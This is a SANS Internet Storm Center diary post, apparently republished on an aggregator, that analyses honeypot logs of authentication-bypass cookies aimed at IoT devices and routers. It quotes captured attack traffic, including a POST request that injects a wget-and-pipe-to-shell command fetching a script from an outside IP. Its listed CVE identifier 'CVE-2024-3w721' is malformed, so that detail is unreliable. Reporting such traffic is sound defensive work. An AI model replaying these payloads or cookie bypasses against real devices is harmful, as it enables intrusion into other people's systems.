文章讨论了信息安全中的常见漏洞,特别是通过HTTP cookie获取用户身份信息以进行攻击的问题。举例说明了多个设备和系统的漏洞利用情况,包括TBK DVR、LB-LINK路由器、Tenda O3V2无线接入点等,并指出这些漏洞被广泛利用。 2025-9-30 15:2:21 Author: isc.sans.edu(查看原文) 阅读量:10 收藏
One of the common infosec jokes is that sometimes, you do not need to "break" an application, but you have to log in. This is often the case for weak default passwords, which are common in IoT devices. However, an even easier method is to tell the application who you are. This does not even require a password! One of the sad recurring vulnerabilities is an HTTP cookie that contains the user's username or userid.
I took a quick look at our honeypot for cookies matching this pattern. Here is a selection:
Cookie: uid=1
Cookie: user=admin
Cookie: O3V2.0_user=admin
Cookie: admin_id=1; gw_admin_ticket=1
Cookie: RAS_Admin_UserInfo_UserName=admin
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.
Cookie: admin_id=1; gw_admin_ticket=1;
Cookie: ASP.NET_SessionId=; sid=admin
These are listed by frequency, with "uid=1" being the most commonly used value.
Let's see if we can identify some of the targeted vulnerabilities.
For the first one (uid=1), the URL hit is:
/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<some shell command>
CVE-2024-3w721: This is a relatively new (2024) OS command injection vulnerability in certain TBK DVRs.
The second one is also an IoT-style issue:
POST /goform/set_LimitClient_cfg
User-Agent: Mozilla/5.0 ([email protected])
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Cookie: user=admintime1=00:00-00:00&time2=00:00-00:00&mac=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xqe.sh%7Csh%26echo%20
CVE-2023-26801: Another "classic" IoT issue. This one affects LB-LINK wireless routers. This vulnerability may never have been patched, but I'm unsure how popular these routers are.
The cookie "O3V2.0_user=admin" is associated with a similar, but more recent issue affecting Tenda O3V2 wireless access points. Wireless internet service providers (WISPs) often use these outdoor access points. The vulnerability is similar to the issue above in that a POST request to "/goform/setPingInfo" is used to carry an OS injection payload—the common URL schemes like "/goform" point to similar firmware and likely similar vulnerabilities.
" admin_id=1; gw_admin_ticket=1": Google returned a reference to a post in Chinese, implying that this is a vulnerability in "Qi'anxin VPN" and allows arbitrary account and password modification.
"RAS_Admin_UserInfo_UserName=admin" affects the "Comai RAS System" software for managing remote desktop environments. Most references to the vulnerability are in Chinese. I did not see a CVE number, but the vulnerability appears to be three years old.
"CMX_SAVED_ID=zero; CMX_ADMIN_ID=science": No CVE, and there is no fix for this issue, which was discovered in 2021. Only affects a biometric access system :( (COMMAX. See https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php.
So in short: Yes... These vulnerabilities are out there, and they are exploited.
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
如有侵权请联系:admin#unsafe.sh